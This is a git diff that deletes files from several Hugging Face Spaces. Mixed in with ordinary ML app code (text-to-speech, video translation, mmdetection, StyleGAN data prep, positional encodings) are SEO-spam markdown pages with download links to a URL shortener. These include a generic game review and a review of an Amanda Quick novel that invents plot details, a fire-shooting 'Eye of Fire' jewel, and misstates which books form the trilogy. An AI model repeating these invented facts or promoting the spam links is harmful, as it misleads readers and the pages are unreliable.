a/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md +++ /dev/null @@ -1,24 +0,0 @@ -
      -

      Alexandra Ledermann 8: Les Secrets du Haras - A Review

      -

      Alexandra Ledermann 8: Les Secrets du Haras is a horse riding simulation and adventure game for PC, released in 2007 by Lexis Numérique and Ubisoft. It is the eighth installment in the popular Alexandra Ledermann series, which features the French equestrian champion as a mentor and guide.

      -

      alexandra ledermann 8 secret des


      Download Zip 🆗 https://tinourl.com/2uL05u



      -

      In this game, you play as Emma, a young Franco-American veterinary student who arrives at a stud farm whose owner has mysteriously disappeared. You have to take care of the animals left alone, participate in competitions, earn rewards, and explore a rich and vast world. You also have to unravel the secrets of the stud farm and its owner, while making friends and enemies along the way.

      -

      The game boasts realistic graphics, animations, and sounds, as well as a dynamic weather system and a day-night cycle. You can customize your character and your horse, choose from different breeds and colors, and equip them with various accessories. You can also interact with other characters and horses, using dialogue options and gestures.

      -

      The game offers two modes of play: story mode and free mode. In story mode, you follow the main plot and complete missions and challenges. In free mode, you can roam around the world and do whatever you want, such as training your horse, collecting items, or taking photos.

      -

      -

      The game also features a multiplayer mode, where you can compete with up to four players online or on a local network. You can choose from different types of events, such as dressage, show jumping, cross country, or barrel racing. You can also chat with other players and exchange items.

      -

      Alexandra Ledermann 8: Les Secrets du Haras is a fun and engaging game for horse lovers and adventure seekers. It offers a lot of content and variety, as well as a captivating story and characters. If you are looking for a game that combines horse riding simulation and adventure, you should definitely check out Alexandra Ledermann 8: Les Secrets du Haras.

      - -

      Alexandra Ledermann 8: Les Secrets du Haras - A Gameplay Overview

      -

      The gameplay of Alexandra Ledermann 8: Les Secrets du Haras is divided into three main aspects: horse riding, adventure, and management. Each aspect has its own mechanics and objectives, and they are interconnected by the story and the world.

      -

      Horse Riding

      -

      Horse riding is the core of the game, as it allows you to travel around the world, participate in competitions, and bond with your horse. You can control your horse using the keyboard or the mouse, and you have to pay attention to its speed, stamina, mood, and health. You also have to take care of your horse by grooming it, feeding it, and treating its injuries.

      -

      The game features different types of horse riding events, such as dressage, show jumping, cross country, or barrel racing. Each event has its own rules and challenges, and you have to perform well to earn points and medals. You can also practice your skills in training mode, where you can set your own goals and obstacles.

      -

      Adventure

      -

      Adventure is the aspect that drives the story and the exploration of the game. You can interact with various characters and objects in the world, using dialogue options and gestures. You can also collect items, such as photos, trophies, clothes, or accessories. Some items are useful for your horse or your missions, while others are just for fun.

      -

      The game has a mystery plot that involves the disappearance of the stud farm owner and her secrets. You have to investigate clues, solve puzzles, and make choices that affect the outcome of the story. You also have to deal with different factions and characters that have their own agendas and personalities.

      -

      Management

      -

      Management is the aspect that involves running the stud farm and taking care of the animals. You have to manage your budget, your staff, your facilities, and your reputation. You have to buy and sell horses, hire and fire employees, upgrade and repair buildings, and attract customers and sponsors.

      -

      You also have to take care of the animals in the stud farm, such as horses, dogs, cats, or rabbits. You have to feed them, clean them, play with them, and heal them. You can also breed horses and create new generations with different traits and abilities.

      81aa517590
      -
      -
      \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md b/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md deleted file mode 100644 index e437ef889f7e4f345d145d9cc67b0a9388103302..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Capcanele iubirii amanda quick pdf 21 o carte plin de suspans pasiune i mister.md +++ /dev/null @@ -1,143 +0,0 @@ - -

      Capcanele Iubirii Amanda Quick Pdf 21: A Review of the Final Part of the Deception Trilogy

      -

      If you are a fan of historical romance novels with a touch of mystery and suspense, you might have heard of Capcanele Iubirii Amanda Quick Pdf 21, the final part of the Deception Trilogy by Amanda Quick. This book is available online as a PDF file and has been translated into Romanian from the original English title Deception. In this article, we will review this book and see what makes it a captivating read for romance lovers.

      -

      capcanele iubirii amanda quick pdf 21


      Download ○○○ https://tinourl.com/2uL5vd



      -

      Introduction

      -

      Before we dive into the summary and analysis of Capcanele Iubirii Amanda Quick Pdf 21, let us first introduce some background information about the book, the author, and the trilogy.

      -

      What is Capcanele Iubirii Amanda Quick Pdf 21?

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel that was published in 1994 by Bantam Books. It is the third and final part of the Deception Trilogy, which also includes Surrender (1990) and Scandal (1991). The book follows the story of Olympia Wingfield, a spinster who inherits a mysterious mansion and a handsome guardian, Jared Ryder, Viscount Chillhurst. Together, they embark on a dangerous adventure to uncover the secrets of Olympia's past and find true love along the way.

      -

      Who is Amanda Quick?

      -

      Amanda Quick is the pen name of Jayne Ann Krentz, a bestselling American author who has written over 50 novels in various genres, such as contemporary romance, historical romance, paranormal romance, and romantic suspense. She has also written under other pseudonyms, such as Jayne Castle and Jayne Taylor. She is known for her witty dialogue, strong female characters, and intricate plots. She has won numerous awards and accolades for her work, such as the Romance Writers of America RITA Award and the Romantic Times Career Achievement Award.

      -

      What is the Deception Trilogy?

      -

      The Deception Trilogy is a series of historical romance novels set in Regency England that feature three couples who fall in love while solving mysteries and facing dangers. The trilogy consists of Surrender, Scandal, and Deception. Each book can be read as a standalone, but they are connected by recurring characters and themes. The trilogy explores topics such as family secrets, social norms, trust, loyalty, and passion.

      -

      Summary of Capcanele Iubirii Amanda Quick Pdf 21

      -

      Now that we have some context about the book, let us summarize its main elements: the main characters, the plot, the setting, and the themes.

      -

      The main characters

      -

      The protagonist of Capcanele Iubirii Amanda Quick Pdf 21 is Olympia Wingfield, a 26-year-old spinster who lives in London with her three orphaned nephews. She is an independent and intelligent woman who loves reading Gothic novels and dreams of becoming a writer. She has a reputation for being eccentric and unconventional among her neighbors and relatives.

      -

      The hero of Capcanele Iubirii Amanda Quick Pdf 21 is Jared Ryder, Viscount Chillhurst, a 35-year-old aristocrat who works as a spy for the Crown. He is a handsome and mysterious man who has a dark past and a dangerous reputation. He is also an expert in ancient languages and codes.

      -

      The antagonist of Capcanele Iubirii Amanda Quick Pdf 21 is Lord Delbridge, a powerful and ruthless nobleman who wants to obtain Olympia's inheritance: a mansion called Stonegate that hides a secret treasure. He is willing to use any means necessary to achieve his goal, including murder and blackmail.

      -

 
      -

      The plot

      -

      The plot of Capcanele Iubirii Amanda Quick Pdf 21 begins when Olympia receives a letter from her late uncle's solicitor informing her that she has inherited Stonegate from him. She decides to travel to Cornwall with her nephews to see her new property. However, she soon discovers that Stonegate is not what she expected: it is a dilapidated and haunted mansion that has been abandoned for years.

      -

      Olympia also learns that she has inherited another thing from her uncle: a guardian named Jared Ryder, Viscount Chillhurst. Jared arrives at Stonegate shortly after Olympia and introduces himself as her uncle's friend and protector. He claims that he has been appointed by her uncle to help her manage Stonegate and keep her safe from any danger.

      -

      Olympia is suspicious of Jared's motives and does not trust him at first. She thinks that he is hiding something from her and that he might be after her inheritance. However, she also feels an undeniable attraction to him and admires his courage and intelligence.

      -

      Jared is also attracted to Olympia and respects her independence and curiosity. He knows that he has to tell her the truth about his mission: he is actually a spy who has been sent by his superior to investigate Stonegate's secret treasure. He believes that Stonegate contains an ancient manuscript that holds the key to a powerful weapon that could change the course of history.

      -

      Jared also knows that he has to protect Olympia from Lord Delbridge, who is also after Stonegate's treasure. Lord Delbridge has hired some thugs to harass Olympia and force her to sell Stonegate to him. He has also kidnapped Olympia's cousin Lavinia, who knows something about Stonegate's history.

      -

      Olympia and Jared decide to work together to solve the mystery of Stonegate and rescue Lavinia. They explore the mansion's hidden passages and chambers, decipher clues and codes left by Olympia's uncle, and face various dangers and traps along the way. They also grow closer to each other and fall in love.

      -

      The climax of Capcanele Iubirii Amanda Quick Pdf 21 occurs when Olympia and Jared find out that Stonegate's treasure is not a manuscript but a jewel called the Eye of Fire. The Eye of Fire is an ancient artifact that can create fireballs when activated by certain words. Olympia's uncle had discovered it in Egypt and brought it to England for safekeeping.

      -

      Olympia and Jared are confronted by Lord Delbridge in Stonegate's secret vault where the Eye of Fire is hidden. Lord Delbridge tries to take the jewel from them but fails because he does not know how to activate it. He then threatens to kill Lavinia unless Olympia gives him the jewel.

      -

      Olympia agrees to give Lord Delbridge the jewel but secretly writes down its activation code on a piece of paper. She then throws the paper into the fire before handing over the jewel to Lord Delbridge. Lord Delbridge does not notice this trick until it is too late: he reads out loud the code from memory but accidentally activates the Eye of Fire instead.

      -

      The Eye of Fire unleashes a fireball that destroys Lord Delbridge and his men. Olympia and Jared manage to escape with Lavinia before Stonegate collapses from the explosion.

      -

      The resolution of Capcanele Iubirii Amanda Quick Pdf 21 occurs when Olympia and Jared return to London with their nephews and Lavinia. They get married in a small ceremony attended by their friends and family. They also decide to write a novel together based on their adventure at Stonegate.

      -

      The setting

      -

      The setting of Capcanele Iubirii Amanda Quick Pdf 21 is Regency England in 1815. The story takes place mostly in Cornwall at Stonegate mansion but also in London at Olympia's house.

      -

 The setting reflects the historical context of the time period: England was recovering from the Napoleonic Wars that had ended earlier that year; social classes were rigidly defined by birth; women had limited rights; and Gothic novels were highly popular among readers. 

      The themes

      -

      The themes of Capcanele Iubirii Amanda Quick Pdf 21 are typical of the Gothic genre, which was popular in Regency England. Some of the themes are:

      -
        -
      • Secrets and mysteries: The book is full of secrets and mysteries that the characters have to uncover, such as Olympia's family history, Jared's spy mission, Stonegate's treasure, and Lord Delbridge's motives.
      • -
      • Romance and passion: The book is also a love story between Olympia and Jared, who overcome their initial distrust and differences to form a strong bond based on mutual respect and desire.
      • -
      • Danger and suspense: The book creates a sense of danger and suspense by putting the characters in perilous situations, such as being attacked by thugs, trapped in hidden rooms, or confronted by a villain.
      • -
      • Supernatural and occult: The book incorporates elements of the supernatural and occult, such as ghosts, curses, ancient artifacts, and fire magic.
      • -
      -

      Analysis of Capcanele Iubirii Amanda Quick Pdf 21

      -

      After summarizing the book, let us now analyze its strengths and weaknesses, and compare it with the previous parts of the trilogy.

      -

      The strengths

      -

      Some of the strengths of Capcanele Iubirii Amanda Quick Pdf 21 are:

      -
        -
      • The characters: The book has well-developed and likable characters who have distinct personalities and backgrounds. Olympia is a strong and independent heroine who does not conform to the expectations of society. Jared is a mysterious and courageous hero who has a sense of honor and duty. They have a good chemistry and banter that makes their relationship believable and enjoyable.
      • -
      • The plot: The book has an engaging and fast-paced plot that keeps the reader interested and entertained. The book combines romance, mystery, adventure, and humor in a balanced way. The book also has some twists and surprises that add to the excitement.
      • -
      • The writing: The book has a clear and fluent writing style that suits the genre and the tone of the story. The book uses descriptive language that creates vivid images of the settings and the scenes. The book also has witty dialogue that reflects the characters' voices and emotions.
      • -
      -

      The weaknesses

      -

      Some of the weaknesses of Capcanele Iubirii Amanda Quick Pdf 21 are:

      -
        -
      • The credibility: The book has some aspects that might seem implausible or unrealistic to some readers, such as the existence of the Eye of Fire, the ease with which Olympia and Jared solve the clues, or the coincidence that they both have an interest in ancient languages.
      • -
      • The originality: The book has some elements that might seem clichéd or predictable to some readers, such as the Gothic tropes, the stereotypical villain, or the happy ending.
      • -
      • The depth: The book has some aspects that might seem superficial or underdeveloped to some readers, such as the historical context, the secondary characters, or the themes.
      • -
      -

      The comparison with the previous parts

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is the final part of the Deception Trilogy, which also includes Surrender and Scandal. Each book can be read as a standalone, but they are connected by recurring characters and themes. Some of the similarities and differences between them are:

      - - - - - -
 Book | Heroine | Hero | Mystery | Setting Surrender | Victoria Huntington | Lucas Colebrook | A stolen necklace | A country estate Scandal | Emily Faringdon | Simon Traherne | A family feud | A castle in Wales Deception | Olympia Wingfield | Jared Ryder | A hidden treasure | A mansion in Cornwall 
      -

 All three books have similar themes of secrets, romance, danger, and the supernatural. However, each book has its own tone and style. Surrender is more sensual and emotional; Scandal is more humorous and playful; Deception is more adventurous and thrilling. 

      -

      Conclusion

      -

      In conclusion, Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel that concludes the Deception Trilogy by Amanda Quick. It tells the story of Olympia Wingfield, a spinster who inherits a haunted mansion and a spy guardian named Jared Ryder. Together, they solve the mystery of Stonegate's treasure and fall in love.

      -

      The main points

      -

      The main points of this article are:

      -
        -
      • Capcanele Iubirii Amanda Quick Pdf 21 is a historical romance novel set in Regency England that is part of the Deception Trilogy by Amanda Quick.
      • -
      • The book follows Olympia Wingfield and Jared Ryder as they explore Stonegate mansion and discover its secret treasure: an ancient jewel called the Eye of Fire.
      • -
 • The book has elements of Gothic fiction such as secrets, mysteries, romance, danger, suspense, and the supernatural and occult. 
      • -
 • The book has strengths such as well-developed characters, an engaging plot, and clear writing; weaknesses such as a lack of credibility, originality, and depth; and, compared with the previous parts, similar themes but a different tone. 
      • -
      -

      The recommendation

      -

 We recommend this book to readers who enjoy historical romance novels with a touch of mystery and suspense. 

      The final verdict

      -

      Capcanele Iubirii Amanda Quick Pdf 21 is a satisfying and entertaining conclusion to the Deception Trilogy by Amanda Quick. It is a book that will appeal to fans of historical romance and Gothic fiction who are looking for a fun and exciting read.

      -

      FAQs

      -

      Here are some frequently asked questions about Capcanele Iubirii Amanda Quick Pdf 21:

      -
        -
 1. Where can I find Capcanele Iubirii Amanda Quick Pdf 21 online? You can find Capcanele Iubirii Amanda Quick Pdf 21 online as a PDF file on Scribd. You can also find the original English version Deception on Amazon or other online bookstores. - 2. Who are the other recurring characters in the Deception Trilogy? Some of the other recurring characters in the Deception Trilogy are: Anthony Stalbridge and Louisa Bryce from The River Knows; Tobias March and Lavinia Lake from Slightly Shady; and Sebastian Fleetwood and Evangeline Stone from Late for the Wedding. They are all friends or relatives of the main couples in the trilogy. - 3. What are some other books by Amanda Quick that are similar to Capcanele Iubirii Amanda Quick Pdf 21? Some other books by Amanda Quick that are similar to Capcanele Iubirii Amanda Quick Pdf 21 are: Ravished, Rendezvous, Dangerous, Mistress, Affair, Mischief, Wicked Widow, The Paid Companion, The Perfect Poison, The Mystery Woman, and Garden of Lies. They are all historical romance novels with elements of mystery and suspense. - 4. What are some other authors who write historical romance novels with elements of Gothic fiction? Some other authors who write historical romance novels with elements of Gothic fiction are: Mary Jo Putney, Victoria Holt, Barbara Michaels, Anne Stuart, Elizabeth Peters, Lauren Willig, Deanna Raybourn, and Simone St. James. - 5. What are some other genres that Amanda Quick writes under other pseudonyms? 

        Amanda Quick also writes contemporary romance novels under her real name Jayne Ann Krentz; paranormal romance novels under the name Jayne Castle; and romantic suspense novels under the name Jayne Taylor.

        -
      -

      0a6ba089eb
      -
      -
      \ No newline at end of file diff --git a/spaces/rahul999r/Rahul_Kannada_TTS/app.py b/spaces/rahul999r/Rahul_Kannada_TTS/app.py deleted file mode 100644 index 3e1d4a83202b2fe13c69bd5581f476d2bc7a2d4a..0000000000000000000000000000000000000000 --- a/spaces/rahul999r/Rahul_Kannada_TTS/app.py +++ /dev/null @@ -1,45 +0,0 @@ -from tts_infer.tts import TextToMel, MelToWav -from tts_infer.transliterate import XlitEngine -from tts_infer.num_to_word_on_sent import normalize_nums - -import re -from scipy.io.wavfile import write - -device = 'cpu' - -mel_to_wav = MelToWav(hifi_model_dir='tts_infer/translit_models1/ma_fe_hifi', device=device) - -def tts(text,gender): - lang = 'kn' - if gender == 'Female': - text_to_mel = TextToMel(glow_model_dir='tts_infer/translit_models1/fe_glow', device=device) - else : - text_to_mel = TextToMel(glow_model_dir='tts_infer/translit_models1/ma_glow', device=device) - text_num_to_word = normalize_nums(text, lang) # converting numbers to words in lang - #text_num_to_word_and_transliterated = translit(text_num_to_word, lang) # transliterating english words to lang - - mel = text_to_mel.generate_mel(text_num_to_word) - audio, sr = mel_to_wav.generate_wav(mel) - #write(filename='temp.wav', rate=sr, data=audio) # for saving wav file, if needed - return (sr, audio) - -import gradio as gr - -# Define the function to generate audio and save it as a WAV file. -def generate_audio(text,gender): - lang = 'kn' # Language code for Kannada - sr, audio = tts(text, gender) - return (sr, audio) - -iface = gr.Interface( - fn=generate_audio, - inputs=[ - gr.components.Textbox(label="Enter Text in Kannada"), - gr.components.Radio(["Male", "Female"], label="Gender") - ], - outputs=[ - gr.Audio(label="Audio") - ] - ) - -iface.launch() \ No newline at end of file diff --git a/spaces/rajeshradhakrishnan/english-malayalam/static/index.html b/spaces/rajeshradhakrishnan/english-malayalam/static/index.html deleted file mode 100644 index d136bb39becb016a7940e0500721da9aa25bea6a..0000000000000000000000000000000000000000 --- a/spaces/rajeshradhakrishnan/english-malayalam/static/index.html +++ /dev/null @@ -1,32 +0,0 @@ - - - - - JavaScipt Open Assistant Clone - - - - - -
      -

      മലയാളം - Open Assistant

      -

      -
      -
      - -
      -
      -
      -

      Open Assistant - This is the 4th iteration English - supervised-fine-tuning (SFT) model of the Open-Assistant project. -

      -
      - - - \ No newline at end of file diff --git a/spaces/rajistics/call-sentiment-demo2/README.md b/spaces/rajistics/call-sentiment-demo2/README.md deleted file mode 100644 index 82884ec6e7d9f87a9e1681d8978df13731f762af..0000000000000000000000000000000000000000 --- a/spaces/rajistics/call-sentiment-demo2/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Call Sentiment Blocks 2 -emoji: 🐠 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.11.0 -app_file: app.py -pinned: false -duplicated_from: enoreyes/call-sentiment-demo ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/reach-vb/music-spectrogram-diffusion/README.md b/spaces/reach-vb/music-spectrogram-diffusion/README.md deleted file mode 100644 index 434952ff57167da6274f0a09727d0038f3d79746..0000000000000000000000000000000000000000 --- a/spaces/reach-vb/music-spectrogram-diffusion/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Music Spectrogram Diffusion -emoji: 🔊 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py deleted file mode 100644 index d759220098440c769b8f53c1e3b902c046450ff4..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/datasets/pipelines/compose.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import collections - -from mmcv.utils import build_from_cfg - -from ..builder import PIPELINES - - -@PIPELINES.register_module() -class Compose: - """Compose multiple transforms sequentially. - - Args: - transforms (Sequence[dict | callable]): Sequence of transform object or - config dict to be composed. - """ - - def __init__(self, transforms): - assert isinstance(transforms, collections.abc.Sequence) - self.transforms = [] - for transform in transforms: - if isinstance(transform, dict): - transform = build_from_cfg(transform, PIPELINES) - self.transforms.append(transform) - elif callable(transform): - self.transforms.append(transform) - else: - raise TypeError('transform must be callable or a dict') - - def __call__(self, data): - """Call function to apply transforms sequentially. - - Args: - data (dict): A result dict contains the data to transform. - - Returns: - dict: Transformed data. - """ - - for t in self.transforms: - data = t(data) - if data is None: - return None - return data - - def __repr__(self): - format_string = self.__class__.__name__ + '(' - for t in self.transforms: - str_ = t.__repr__() - if 'Compose(' in str_: - str_ = str_.replace('\n', '\n ') - format_string += '\n' - format_string += f' {str_}' - format_string += '\n)' - return format_string diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py deleted file mode 100644 index 7aebe151feb22354573b7b06675e15be3f610fe6..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/fast_rcnn.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
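 -# Note: Fast R-CNN is the two-stage detector that uses pre-computed region proposals -# instead of an RPN; that is why forward_test() below accepts a `proposals` argument -# (one list of proposal tensors per test-time augmentation). 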
-from ..builder import DETECTORS -from .two_stage import TwoStageDetector - - -@DETECTORS.register_module() -class FastRCNN(TwoStageDetector): - """Implementation of `Fast R-CNN `_""" - - def __init__(self, - backbone, - roi_head, - train_cfg, - test_cfg, - neck=None, - pretrained=None, - init_cfg=None): - super(FastRCNN, self).__init__( - backbone=backbone, - neck=neck, - roi_head=roi_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - pretrained=pretrained, - init_cfg=init_cfg) - - def forward_test(self, imgs, img_metas, proposals, **kwargs): - """ - Args: - imgs (List[Tensor]): the outer list indicates test-time - augmentations and inner Tensor should have a shape NxCxHxW, - which contains all images in the batch. - img_metas (List[List[dict]]): the outer list indicates test-time - augs (multiscale, flip, etc.) and the inner list indicates - images in a batch. - proposals (List[List[Tensor]]): the outer list indicates test-time - augs (multiscale, flip, etc.) and the inner list indicates - images in a batch. The Tensor should have a shape Px4, where - P is the number of proposals. - """ - for var, name in [(imgs, 'imgs'), (img_metas, 'img_metas')]: - if not isinstance(var, list): - raise TypeError(f'{name} must be a list, but got {type(var)}') - - num_augs = len(imgs) - if num_augs != len(img_metas): - raise ValueError(f'num of augmentations ({len(imgs)}) ' - f'!= num of image meta ({len(img_metas)})') - - if num_augs == 1: - return self.simple_test(imgs[0], img_metas[0], proposals[0], - **kwargs) - else: - # TODO: support test-time augmentation - assert NotImplementedError diff --git a/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md b/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md deleted file mode 100644 index 96ec4f3a5262dfcaa91175a4c275d650e4b31ef5..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/HD Online Player (The Chronicles Of Narnia 4 The Silve) __TOP__.md +++ /dev/null @@ -1,6 +0,0 @@ -

      HD Online Player (The Chronicles Of Narnia 4 The Silve)


      Download File » https://tinurll.com/2uzoBt



      -
      - 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py b/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py deleted file mode 100644 index 70fc07130755bdf97285afa43ec9284604acf1d3..0000000000000000000000000000000000000000 --- a/spaces/rubensmau/Dov_Tzamir/data_driven_characters/constants.py +++ /dev/null @@ -1,2 +0,0 @@ -DATA_ROOT = "data" -VERBOSE = True diff --git a/spaces/ruslanmv/Video-Translator/app.py b/spaces/ruslanmv/Video-Translator/app.py deleted file mode 100644 index 2ecdcd8c78638c3613ac928fda86b60c469207c2..0000000000000000000000000000000000000000 --- a/spaces/ruslanmv/Video-Translator/app.py +++ /dev/null @@ -1,93 +0,0 @@ -# coding=utf8 -from gtts import gTTS -import gradio as gr -import os -import speech_recognition as sr -from googletrans import Translator, constants -from pprint import pprint -from moviepy.editor import * -def video_to_translate(file_obj,initial_language,final_language): -# Insert Local Video File Path - videoclip = VideoFileClip(file_obj.name) - # Insert Local Audio File Path - videoclip.audio.write_audiofile("test.wav",codec='pcm_s16le') -# initialize the recognizer - r = sr.Recognizer() - - if initial_language == "English": - lang_in='en-US' - elif initial_language == "Italian": - lang_in='it-IT' - elif initial_language == "Spanish": - lang_in='es-MX' - elif initial_language == "Russian": - lang_in='ru-RU' - elif initial_language == "German": - lang_in='de-DE' - elif initial_language == "Japanese": - lang_in='ja-JP' - elif initial_language == "Portuguese": - lang_in='pt-BR' - # open the file - with sr.AudioFile("test.wav") as source: - # listen for the data (load audio to memory) - audio_data = r.record(source) - # recognize (convert from speech to text) - text = r.recognize_google(audio_data, language = lang_in) - - if final_language == "English": - lang='en' - elif final_language == "Italian": - lang='it' - elif final_language == "Spanish": - lang='es' - elif final_language == "Russian": - lang='ru' - elif final_language == "German": - lang='de' - elif final_language == "Japanese": - lang='ja' - elif final_language == "Portuguese": - lang='pt' - print(lang) - # init the Google API translator - translator = Translator() - translation = translator.translate(text, dest=lang) - #translation.text - trans=translation.text - myobj = gTTS(text=trans, lang=lang, slow=False) - myobj.save("audio.wav") - # loading audio file - audioclip = AudioFileClip("audio.wav") - - # adding audio to the video clip - new_audioclip = CompositeAudioClip([audioclip]) - videoclip.audio = new_audioclip - new_video="video_translated_"+lang+".mp4" - videoclip.write_videofile(new_video) - #return 'audio.wav' - return new_video - -initial_language = gr.inputs.Dropdown(["English","Italian","Japanese","Russian","Spanish","German","Portuguese"]) -final_language = gr.inputs.Dropdown([ "Russian","Italian","Spanish","German","English","Japanese","Portuguese"]) - - -gr.Interface(fn = video_to_translate, - inputs = ['file',initial_language,final_language], - outputs = 'video', - verbose = True, - title = 'Video Translator', - description = 'A simple application that translates from English, Italian, Japanese, Russian, Spanish, Portuguese and German video files to Italian, Spanish, Russian, English , Portuguese and Japanese. Upload your own file, or click one of the examples to load them. Wait one minute to process.', - article = - '''
      -

 All you need to do is upload the mp4 file and hit submit, then wait for processing. After that, click on Play/Pause to listen to the translated video. The video is saved in mp4 format. - For more information visit ruslanmv.com -
            

      -
      ''', - # examples=[['obama.mp4',"English",'Spanish'], - # ['obama.mp4',"English",'Italian'], - # ['obama.mp4',"English",'German'], - # ['obama.mp4',"English",'Japanese'], - # ['obama.mp4',"English",'Portuguese'] - # ] - ).launch() \ No newline at end of file diff --git a/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py b/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py deleted file mode 100644 index db49cbda14aca3b2bc0268a4f40cd97f2dd603cc..0000000000000000000000000000000000000000 --- a/spaces/safi842/FashionGen/models/stylegan2/stylegan2-pytorch/prepare_data.py +++ /dev/null @@ -1,82 +0,0 @@ -import argparse -from io import BytesIO -import multiprocessing -from functools import partial - -from PIL import Image -import lmdb -from tqdm import tqdm -from torchvision import datasets -from torchvision.transforms import functional as trans_fn - - -def resize_and_convert(img, size, resample, quality=100): - img = trans_fn.resize(img, size, resample) - img = trans_fn.center_crop(img, size) - buffer = BytesIO() - img.save(buffer, format='jpeg', quality=quality) - val = buffer.getvalue() - - return val - - -def resize_multiple(img, sizes=(128, 256, 512, 1024), resample=Image.LANCZOS, quality=100): - imgs = [] - - for size in sizes: - imgs.append(resize_and_convert(img, size, resample, quality)) - - return imgs - - -def resize_worker(img_file, sizes, resample): - i, file = img_file - img = Image.open(file) - img = img.convert('RGB') - out = resize_multiple(img, sizes=sizes, resample=resample) - - return i, out - - -def prepare(env, dataset, n_worker, sizes=(128, 256, 512, 1024), resample=Image.LANCZOS): - resize_fn = partial(resize_worker, sizes=sizes, resample=resample) - - files = sorted(dataset.imgs, key=lambda x: x[0]) - files = [(i, file) for i, (file, label) in enumerate(files)] - total = 0 - - with multiprocessing.Pool(n_worker) as pool: - for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)): - for size, img in zip(sizes, imgs): - key = f'{size}-{str(i).zfill(5)}'.encode('utf-8') - - with env.begin(write=True) as txn: - txn.put(key, img) - - total += 1 - - with env.begin(write=True) as txn: - txn.put('length'.encode('utf-8'), str(total).encode('utf-8')) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--out', type=str) - parser.add_argument('--size', type=str, default='128,256,512,1024') - parser.add_argument('--n_worker', type=int, default=8) - parser.add_argument('--resample', type=str, default='lanczos') - parser.add_argument('path', type=str) - - args = parser.parse_args() - - resample_map = {'lanczos': Image.LANCZOS, 'bilinear': Image.BILINEAR} - resample = resample_map[args.resample] - - sizes = [int(s.strip()) for s in args.size.split(',')] - - print(f'Make dataset of image sizes:', ', '.join(str(s) for s in sizes)) - - imgset = datasets.ImageFolder(args.path) - - with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env: - prepare(env, imgset, args.n_worker, sizes=sizes, resample=resample) diff --git a/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py b/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py deleted file mode 100644 index 05580e052d6bb1fe782441e7e65088f7989e8e0b..0000000000000000000000000000000000000000 --- a/spaces/samuelinferences/transformers-can-do-bayesian-inference/prior-fitting/positional_encodings.py +++ /dev/null @@ -1,70 +0,0 @@ -import math - 
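 -# Note: NoPositionalEncoding is a pass-through, PositionalEncoding adds the fixed -# sinusoidal table from "Attention Is All You Need", and the Learned/PairedScrambled -# variants add a trainable (max_len, d_model) embedding table to the input. 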
-import torch -from torch import nn - - -# Protocol for positonal encodings. -# __init__(d_model, max_len=..[, more optionals]) -# forward(x: (seq_len, bs, d_model)) -> Tensor of shape (*x.shape[:2],d_model) containing pos. embeddings - - -class NoPositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=None): - super(NoPositionalEncoding, self).__init__() - pass - - def forward(self, x): - return x #* math.sqrt(x.shape[-1]) - - -class PositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=5000): - super(PositionalEncoding, self).__init__() - pe = torch.zeros(max_len, d_model) - position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) - div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)) - pe[:, 0::2] = torch.sin(position * div_term) - pe[:, 1::2] = torch.cos(position * div_term) - pe = pe.unsqueeze(0).transpose(0, 1) - self.register_buffer('pe', pe) - - def forward(self, x): - x = self.pe[:x.size(0), :] + x # * math.sqrt(x.shape[-1]) - return x - - -class LearnedPositionalEncoding(nn.Module): - def __init__(self, d_model, max_len=5000): - super(LearnedPositionalEncoding, self).__init__() - self.max_seq_len = max_len - #self.positional_embeddings = nn.Embedding(max_len, d_model) - self.positional_embeddings = nn.Parameter(torch.empty(max_len, d_model)) - 